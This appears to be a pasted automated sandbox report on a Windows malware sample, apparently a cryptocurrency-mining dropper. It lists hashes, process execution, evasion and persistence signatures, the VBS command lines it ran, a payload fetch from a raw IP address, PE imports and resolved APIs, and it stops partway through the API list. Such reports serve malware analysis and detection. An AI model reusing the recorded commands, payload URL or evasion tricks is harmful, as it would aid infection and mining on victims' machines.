Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: ""
- [*] MalScore: 9.399999999999999
- [*] File Name: "Exes_ce854dd32e1d931cd6a791b30dcd9458.exe"
- [*] File Size: 1345024
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "ac4daabcc33e6d296965a9e4b5af21fa43e47f49c58da62c420ebb66694b819a"
- [*] MD5: "ce854dd32e1d931cd6a791b30dcd9458"
- [*] SHA1: "0b247814ee8be3926e0dd64e749d7a4f174f96b7"
- [*] SHA512: "12cc6264daa1deaf81d59153f8cb9f9ed5b67dd45d6c954706c4a9052807384395ceb008b082e9bf903493dc9e52769fcf91a8295be9beae95655691a72c7e42"
- [*] CRC32: "E8983C06"
- [*] SSDEEP: "24576:fLz8dhwdpThXXqJP5JsO569Trwzy7rgUr+ZDgTkIWSk8s9ifWTbY0OXLtzkiphmA:fLYQDUxJ/5iky7rg08DghFsfYJIm8A"
- [*] Process Execution: [
- "Exes_ce854dd32e1d931cd6a791b30dcd9458.exe",
- "notepad.exe",
- "cmd.exe",
- "wscript.exe",
- "notepad.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
- "Details": [
- {
- "IP": "37.59.162.30:5790"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details": [
- {
- "Window": "WSH-Timer"
- }
- ]
- },
- {
- "Description": "A process attempted to delay the analysis task.",
- "Details": [
- {
- "Process": "Exes_ce854dd32e1d931cd6a791b30dcd9458.exe tried to sleep 293 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details": [
- {
- "ioc": "nvcuda.dll"
- },
- {
- "ioc": "opencl.dll"
- },
- {
- "ioc": "ntdll.dll"
- },
- {
- "ioc": "nicehash.com"
- },
- {
- "ioc": "isassx.exe"
- },
- {
- "ioc": "taskmgr.exe"
- },
- {
- "ioc": "bdagent.exe"
- },
- {
- "ioc": "vsserv.exe"
- },
- {
- "ioc": "cfp.exe"
- },
- {
- "ioc": "ccavsrv.exe"
- },
- {
- "ioc": "cmdagent.exe"
- },
- {
- "ioc": "avp.exe"
- },
- {
- "ioc": "avpui.exe"
- },
- {
- "ioc": "ksde.exe"
- },
- {
- "ioc": "a2guard.exe"
- },
- {
- "ioc": "a2service.exe"
- },
- {
- "ioc": "a2start.exe"
- },
- {
- "ioc": "hell32.dll"
- },
- {
- "ioc": "kernel32.dll"
- },
- {
- "ioc": "csrss.exe"
- },
- {
- "ioc": "winlogon.exe"
- },
- {
- "ioc": "explorer.exe"
- },
- {
- "ioc": "32.dll"
- },
- {
- "ioc": "ole32.dll"
- },
- {
- "ioc": "t.69O2"
- },
- {
- "ioc": "8.x9"
- },
- {
- "ioc": "a.y8"
- },
- {
- "ioc": "c.i7"
- },
- {
- "ioc": "3.5dn"
- },
- {
- "ioc": "p.9f"
- },
- {
- "ioc": "g.f3"
- },
- {
- "ioc": "dd.4c7"
- },
- {
- "ioc": "x2.mb"
- },
- {
- "ioc": "9.r1"
- },
- {
- "ioc": "9.rs"
- },
- {
- "ioc": "s.8.P"
- },
- {
- "ioc": "h.3b"
- },
- {
- "ioc": "p5.xqn"
- },
- {
- "ioc": "2.282B2L2V2"
- },
- {
- "ioc": "6.6n6"
- }
- ]
- },
- {
- "Description": "Network anomalies occured during the analysis.",
- "Details": [
- {
- "Anomaly": "'37.59.162.30' getaddrinfo with no actual connection to the IP."
- }
- ]
- },
- {
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details": []
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: Exes_ce854dd32e1d931cd6a791b30dcd9458.exe, pid: 1648, offset: 0x00000000, length: 0x00148600"
- },
- {
- "self_read": "process: wscript.exe, pid: 2496, offset: 0x00000000, length: 0x00000040"
- },
- {
- "self_read": "process: wscript.exe, pid: 2496, offset: 0x000000f0, length: 0x00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 2496, offset: 0x000001e8, length: 0x00000078"
- },
- {
- "self_read": "process: wscript.exe, pid: 2496, offset: 0x00018000, length: 0x00000020"
- },
- {
- "self_read": "process: wscript.exe, pid: 2496, offset: 0x00018058, length: 0x00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 2496, offset: 0x000181a8, length: 0x00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 2496, offset: 0x00018470, length: 0x00000010"
- },
- {
- "self_read": "process: wscript.exe, pid: 2496, offset: 0x00018640, length: 0x00000012"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "Exes_ce854dd32e1d931cd6a791b30dcd9458.exe -> cmd.exe /C WScript \"C:\\ProgramData\\iEtHqNVRGt\\r.vbs\""
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://37.44.212.223/xdxd.txt"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://37.44.212.223/xdxd.txt"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- }
- ]
- },
- {
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details": [
- {
- "section": "name: .data, entropy: 7.97, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0013de00, virtual_size: 0x0013f920"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\zylUYKzaGy.url"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\zylUYKzaGy.url"
- }
- ]
- }
- ]
- [*] Started Service: []
- [*] Executed Commands: [
- "\"C:\\Windows\\notepad.exe\" -c \"C:\\ProgramData\\iEtHqNVRGt\\cfgi\"",
- "cmd.exe /C WScript \"C:\\ProgramData\\iEtHqNVRGt\\r.vbs\"",
- "\"C:\\Windows\\notepad.exe\" -c \"C:\\ProgramData\\iEtHqNVRGt\\cfg\"",
- "C:\\Windows\\system32\\wscript.exe WScript \"C:\\ProgramData\\iEtHqNVRGt\\r.vbs\""
- ]
- [*] Mutexes: [
- "4e064bee1f3860fd606a"
- ]
- [*] Modified Files: [
- "C:\\ProgramData\\iEtHqNVRGt\\isassx.exe",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\zylUYKzaGy.url"
- ]
- [*] Deleted Files: [
- "C:\\ProgramData\\iEtHqNVRGt\\r.vbs",
- "C:\\ProgramData\\iEtHqNVRGt\\isassx.exe",
- "C:\\ProgramData\\iEtHqNVRGt\\isassx"
- ]
- [*] Modified Registry Keys: []
- [*] Deleted Registry Keys: []
- [*] DNS Communications: []
- [*] Domains: []
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://37.44.212.223/xdxd.txt",
- "user-agent": "WinInetGet/0.1",
- "method": "GET",
- "host": "37.44.212.223",
- "version": "1.1",
- "path": "/xdxd.txt",
- "data": "GET /xdxd.txt HTTP/1.1\r\nAccept: text/*, application/exe, application/zlib, application/gzip, application/applefile\r\nUser-Agent: WinInetGet/0.1\r\nHost: 37.44.212.223\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "HttpSendRequestA",
- "address": "0x40911c"
- },
- {
- "name": "HttpOpenRequestA",
- "address": "0x409120"
- },
- {
- "name": "InternetSetOptionA",
- "address": "0x409124"
- },
- {
- "name": "InternetReadFile",
- "address": "0x409128"
- },
- {
- "name": "InternetConnectA",
- "address": "0x40912c"
- },
- {
- "name": "InternetCloseHandle",
- "address": "0x409130"
- },
- {
- "name": "InternetOpenA",
- "address": "0x409134"
- },
- {
- "name": "InternetCrackUrlA",
- "address": "0x409138"
- },
- {
- "name": "InternetQueryOptionA",
- "address": "0x40913c"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "MultiByteToWideChar",
- "address": "0x409038"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x40903c"
- },
- {
- "name": "FreeLibrary",
- "address": "0x409040"
- },
- {
- "name": "GetProcAddress",
- "address": "0x409044"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x409048"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x40904c"
- },
- {
- "name": "VirtualFree",
- "address": "0x409050"
- },
- {
- "name": "TerminateThread",
- "address": "0x409054"
- },
- {
- "name": "GetExitCodeThread",
- "address": "0x409058"
- },
- {
- "name": "Sleep",
- "address": "0x40905c"
- },
- {
- "name": "LocalFree",
- "address": "0x409060"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x409064"
- },
- {
- "name": "ExitProcess",
- "address": "0x409068"
- },
- {
- "name": "CreateThread",
- "address": "0x40906c"
- },
- {
- "name": "SetThreadExecutionState",
- "address": "0x409070"
- },
- {
- "name": "GetLastError",
- "address": "0x409074"
- },
- {
- "name": "SetErrorMode",
- "address": "0x409078"
- },
- {
- "name": "GetFileSizeEx",
- "address": "0x40907c"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x409080"
- },
- {
- "name": "GetTickCount",
- "address": "0x409084"
- },
- {
- "name": "CreateMutexA",
- "address": "0x409088"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x40908c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x409090"
- },
- {
- "name": "GetWindowsDirectoryW",
- "address": "0x409094"
- },
- {
- "name": "CreateDirectoryW",
- "address": "0x409098"
- },
- {
- "name": "TerminateProcess",
- "address": "0x40909c"
- },
- {
- "name": "ExitThread",
- "address": "0x4090a0"
- },
- {
- "name": "ReadProcessMemory",
- "address": "0x4090a4"
- },
- {
- "name": "GetThreadContext",
- "address": "0x4090a8"
- },
- {
- "name": "SetThreadContext",
- "address": "0x4090ac"
- },
- {
- "name": "HeapFree",
- "address": "0x4090b0"
- },
- {
- "name": "CreateProcessW",
- "address": "0x4090b4"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4090b8"
- },
- {
- "name": "DeleteFileW",
- "address": "0x4090bc"
- },
- {
- "name": "MoveFileW",
- "address": "0x4090c0"
- },
- {
- "name": "GetLongPathNameW",
- "address": "0x4090c4"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x4090c8"
- },
- {
- "name": "GetTempPathW",
- "address": "0x4090cc"
- },
- {
- "name": "OpenProcess",
- "address": "0x4090d0"
- },
- {
- "name": "GetExitCodeProcess",
- "address": "0x4090d4"
- },
- {
- "name": "ReadFile",
- "address": "0x4090d8"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x4090dc"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x4090e0"
- },
- {
- "name": "CreateFileW",
- "address": "0x4090e4"
- },
- {
- "name": "GetFileAttributesW",
- "address": "0x4090e8"
- },
- {
- "name": "CreateToolhelp32Snapshot",
- "address": "0x4090ec"
- },
- {
- "name": "Process32First",
- "address": "0x4090f0"
- },
- {
- "name": "Process32Next",
- "address": "0x4090f4"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x4090f8"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4090fc"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x409100"
- },
- {
- "name": "CloseHandle",
- "address": "0x409104"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetLastInputInfo",
- "address": "0x409114"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExW",
- "address": "0x409000"
- },
- {
- "name": "ConvertSidToStringSidW",
- "address": "0x409004"
- },
- {
- "name": "CryptDestroyHash",
- "address": "0x409008"
- },
- {
- "name": "CryptHashData",
- "address": "0x40900c"
- },
- {
- "name": "CryptCreateHash",
- "address": "0x409010"
- },
- {
- "name": "CryptGetHashParam",
- "address": "0x409014"
- },
- {
- "name": "CryptReleaseContext",
- "address": "0x409018"
- },
- {
- "name": "CryptAcquireContextW",
- "address": "0x40901c"
- },
- {
- "name": "IsValidSid",
- "address": "0x409020"
- },
- {
- "name": "RegSetValueExW",
- "address": "0x409024"
- },
- {
- "name": "OpenProcessToken",
- "address": "0x409028"
- },
- {
- "name": "GetTokenInformation",
- "address": "0x40902c"
- },
- {
- "name": "RegCloseKey",
- "address": "0x409030"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "CommandLineToArgvW",
- "address": "0x40910c"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "CoTaskMemFree",
- "address": "0x409144"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x00148ad8",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00404250",
- "timestamp": "2019-03-04 01:08:35",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00007c00",
- "entropy": "6.23",
- "raw_address": "0x00000400",
- "virtual_size": "0x00007b44",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00002000",
- "entropy": "5.22",
- "raw_address": "0x00008000",
- "virtual_size": "0x00001fbc",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0000b000",
- "size_of_data": "0x0013de00",
- "entropy": "7.97",
- "raw_address": "0x0000a000",
- "virtual_size": "0x0013f920",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0014b000",
- "size_of_data": "0x00000800",
- "entropy": "6.61",
- "raw_address": "0x00147e00",
- "virtual_size": "0x000007b8",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a820",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000008c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0014b000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x000007b8"
- },
- {
- "virtual_address": "0x0000a740",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x0000001c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00009000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000150"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "ded6c839e7f7258224ae021602258361",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 6,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.IsWow64Process",
- "ntdll.dll.RtlGetVersion",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptCreateHash",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptReleaseContext",
- "shell32.dll.SHGetKnownFolderPath",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036",
- "kernel32.dll.AddVectoredExceptionHandler",
- "kernel32.dll.AssignProcessToJobObject",
- "kernel32.dll.CancelIo",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.ConnectNamedPipe",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.CreateEventA",
- "kernel32.dll.CreateFileA",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.CreateHardLinkW",
- "kernel32.dll.CreateIoCompletionPort",
- "kernel32.dll.CreateJobObjectW",
- "kernel32.dll.CreateNamedPipeA",
- "kernel32.dll.CreateNamedPipeW",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.CreateSemaphoreA",
- "kernel32.dll.CreateSemaphoreW",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.DebugBreak",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.DeviceIoControl",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.FileTimeToSystemTime",
- "kernel32.dll.FillConsoleOutputAttribute",
- "kernel32.dll.FillConsoleOutputCharacterW",
- "kernel32.dll.FlushFileBuffers",
- "kernel32.dll.FlushInstructionCache",
- "kernel32.dll.FormatMessageA",
- "kernel32.dll.FreeConsole",
- "kernel32.dll.GetConsoleCursorInfo",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "kernel32.dll.GetConsoleTitleW",
- "kernel32.dll.GetConsoleWindow",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.GetCurrentThread",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.GetEnvironmentVariableW",
- "kernel32.dll.GetExitCodeProcess",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.GetFileInformationByHandle",
- "kernel32.dll.GetFileSizeEx",
- "kernel32.dll.GetFileType",
- "kernel32.dll.GetHandleInformation",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetLongPathNameW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.GetModuleHandleW",
- "kernel32.dll.GetNamedPipeHandleStateA",
- "kernel32.dll.GetNumberOfConsoleInputEvents",
- "kernel32.dll.GetProcAddress",
- "kernel32.dll.GetProcessAffinityMask",
- "kernel32.dll.GetProcessIoCounters",
- "kernel32.dll.GetProcessTimes",
- "kernel32.dll.GetQueuedCompletionStatus",
- "kernel32.dll.GetShortPathNameW",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.GetStartupInfoW",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.GetSystemTimeAdjustment",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.GetTempPathW",
- "kernel32.dll.GetThreadContext",
- "kernel32.dll.GetThreadPriority",
- "kernel32.dll.GetThreadTimes",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GlobalMemoryStatusEx",
- "kernel32.dll.InitializeCriticalSection",
- "kernel32.dll.IsDBCSLeadByteEx",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.LocalAlloc",
- "kernel32.dll.LocalFree",
- "kernel32.dll.MoveFileExW",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.OpenProcess",
- "kernel32.dll.OutputDebugStringA",
- "kernel32.dll.PeekNamedPipe",
- "kernel32.dll.PostQueuedCompletionStatus",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32Next",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.QueryPerformanceFrequency",
- "kernel32.dll.QueueUserWorkItem",
- "kernel32.dll.RaiseException",
- "kernel32.dll.ReadConsoleInputW",
- "kernel32.dll.ReadConsoleW",
- "kernel32.dll.ReadDirectoryChangesW",
- "kernel32.dll.ReadFile",
- "kernel32.dll.RegisterWaitForSingleObject",
- "kernel32.dll.ReleaseSemaphore",
- "kernel32.dll.RemoveDirectoryW",
- "kernel32.dll.RemoveVectoredExceptionHandler",
- "kernel32.dll.ResetEvent",
- "kernel32.dll.ResumeThread",
- "kernel32.dll.RtlAddFunctionTable",
- "kernel32.dll.RtlCaptureContext",
- "kernel32.dll.RtlLookupFunctionEntry",
- "kernel32.dll.RtlUnwindEx",
- "kernel32.dll.RtlVirtualUnwind",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.SetConsoleCursorInfo",
- "kernel32.dll.SetConsoleCursorPosition",
- "kernel32.dll.SetConsoleMode",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.SetCurrentDirectoryW",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.SetEvent",
- "kernel32.dll.SetFilePointerEx",
- "kernel32.dll.SetFileTime",
- "kernel32.dll.SetHandleInformation",
- "kernel32.dll.SetInformationJobObject",
- "kernel32.dll.SetLastError",
- "kernel32.dll.SetNamedPipeHandleState",
- "kernel32.dll.SetPriorityClass",
- "kernel32.dll.SetProcessAffinityMask",
- "kernel32.dll.SetSystemTime",
- "kernel32.dll.SetThreadAffinityMask",
- "kernel32.dll.SetThreadContext",
- "kernel32.dll.SetThreadPriority",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.Sleep",
- "kernel32.dll.SuspendThread",
- "kernel32.dll.SwitchToThread",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.TlsAlloc",
- "kernel32.dll.TlsFree",
- "kernel32.dll.TlsGetValue",
- "kernel32.dll.TlsSetValue",
- "kernel32.dll.TryEnterCriticalSection",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.UnregisterWait",
- "kernel32.dll.UnregisterWaitEx",
- "kernel32.dll.VerSetConditionMask",
- "kernel32.dll.VerifyVersionInfoA",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.WaitForMultipleObjects",
